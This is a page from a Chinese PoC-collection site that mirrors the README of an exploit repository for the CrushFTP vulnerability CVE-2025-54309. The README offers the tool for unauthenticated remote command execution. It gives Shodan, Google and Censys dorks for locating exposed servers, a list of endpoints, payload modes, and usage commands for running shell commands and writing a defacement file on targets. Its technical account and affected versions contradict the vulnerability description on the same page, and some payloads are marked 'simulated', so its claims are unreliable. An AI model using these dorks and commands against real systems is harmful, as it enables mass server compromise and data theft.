POC详情: f358f181106c71a16419bd858a72166aca2eeabc

来源
关联漏洞
标题: CrushFTP 安全漏洞 (CVE-2025-54309)
描述:CrushFTP是CrushFTP公司的一款文件传输服务器。 CrushFTP 10.8.5之前版本和11.3.4_23之前版本存在安全漏洞,该漏洞源于AS2验证处理不当,可能导致远程攻击者获取管理员权限。
描述
CrushFTP Unauthenticated Remote Command Execution Exploit
介绍
# 💥 CVE-2025-54309 - CrushFTP Unauthenticated Remote Command Execution Exploit

> **PoC by Issam Junior**  
> [![GitHub](https://img.shields.io/badge/GitHub-issamjr-181717?logo=github&logoColor=white)](https://github.com/issamjr)
> [![Twitter](https://img.shields.io/badge/Twitter-@issam_juniorx-1DA1F2?logo=twitter&logoColor=white)](https://x.com/issam_juniorx)
> [![Telegram](https://img.shields.io/badge/Telegram-issamiso-26A5E4?logo=telegram&logoColor=white)](https://t.me/issamiso)

---

## 🚨 Vulnerability Overview

- **CVE:** CVE-2025-54309
- **CVSS:** 9.8 (Critical)
- **Product:** CrushFTP
- **Impact:** Unauthenticated Remote Command Execution (RCE) over HTTPS

CrushFTP, a popular enterprise file transfer solution, suffers from a critical vulnerability in its DMZ proxy implementation. Missing checks allow external attackers to reach the admin interface via HTTPS POST requests, bypassing authentication and directly invoking system commands.

### Technical Breakdown

The vulnerability exists due to an incomplete validation in the DMZ proxy's handling of HTTPS requests. By crafting a malicious XML-RPC request to the `/WebInterface/function/` endpoint, attackers can trigger system commands on the server **without authentication**. This flaw allows full server compromise, data theft, and lateral movement.

**Affected Versions:**  
> All CrushFTP versions prior to 10.7.0 (verify with vendor advisories for specifics).

---

## 🕵️‍♂️ Dorks for Hunting CrushFTP Servers

### 🔎 Shodan Dorks
```
http.favicon.hash:427298725 "CrushFTP"
http.html:"CrushFTP"
product:"CrushFTP"
ssl:"CrushFTP"
port:443 "CrushFTP"
```

### 🦊 Ffuf/Faff Dorks (URL Discovery)
```
/WebInterface/function/
/WebInterface/login/
/WebInterface/json/
/WebInterface/info/
/favicon.ico
```

### 🕷️ Hunter Dorks (Google, Censys, etc.)
```
title:"CrushFTP WebInterface"
"Powered by CrushFTP"
inurl:/WebInterface/function/
inurl:/WebInterface/login/
```

---

## ⚡ Exploit Features

- **Multiple Payloads:**
  - **xml**: XML-RPC command injection (default, most reliable).
  - **cmd_inject**: Classic command injection via POST parameters.
  - **json**: JSON-based RCE simulation (if endpoint supports).
  - **file_upload**: Simulated arbitrary file write (upload).
- **Recon Mode:**
  - Fingerprints CrushFTP version.
  - Scans for interesting endpoints and methods.
- **Output Parsing:**
  - Extracts and highlights command output from responses.

---

## ⚡ Exploit Usage

### 1. Install Dependencies

```bash
pip install -r requirements.txt
```

### 2. Run the Exploit

```bash
python3 exploit.py <target> [-c <cmd>] [-p <payload>] [--recon]
```

- `<target>`: IP or domain of the vulnerable CrushFTP server.
- `-c <cmd>`: (Optional) Command to execute. Defaults to `id`.
- `-p <payload>`: (Optional) Payload type. Options: `xml`, `cmd_inject`, `json`, `file_upload` (default: `xml`).
- `--upload-file <filename>` and `--upload-data <data>`: Used with `file_upload` payload type.
- `--recon`: Run endpoint scan & version fingerprint.

**Examples:**

- XML-RPC RCE (default):
  ```bash
  python3 exploit.py 192.168.1.100 -c "uname -a"
  ```

- Command Injection via login:
  ```bash
  python3 exploit.py 192.168.1.100 -c "whoami" -p cmd_inject
  ```

- File Upload (simulated):
  ```bash
  python3 exploit.py 192.168.1.100 -p file_upload --upload-file "/tmp/pwned.txt" --upload-data "CrushFTP hacked by Issam Junior"
  ```

- Reconnaissance:
  ```bash
  python3 exploit.py 192.168.1.100 --recon
  ```

---

### 3. Output

- **Green**: Successful exploitation and command output.
- **Red**: Errors (network issues, non-vulnerable target).
- **Yellow**: Warnings (unexpected response).

---

## ⚠️ Disclaimer

> **This PoC is for educational purposes only.  
> Do not use on systems without authorization.  
> You are solely responsible for your actions.**

---

## 👤 Author & Socials

- **Name:** Issam Junior

[![GitHub](https://img.shields.io/badge/GitHub-issamjr-181717?logo=github&logoColor=white)](https://github.com/issamjr)
[![Twitter](https://img.shields.io/badge/Twitter-@issam_juniorx-1DA1F2?logo=twitter&logoColor=white)](https://x.com/issam_juniorx)
[![Telegram](https://img.shields.io/badge/Telegram-issamiso-26A5E4?logo=telegram&logoColor=white)](https://t.me/issamiso)

文件快照

[4.0K] /data/pocs/f358f181106c71a16419bd858a72166aca2eeabc ├── [8.4K] exploit.py ├── [1.0K] LICENSE ├── [4.2K] README.md └── [ 19] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。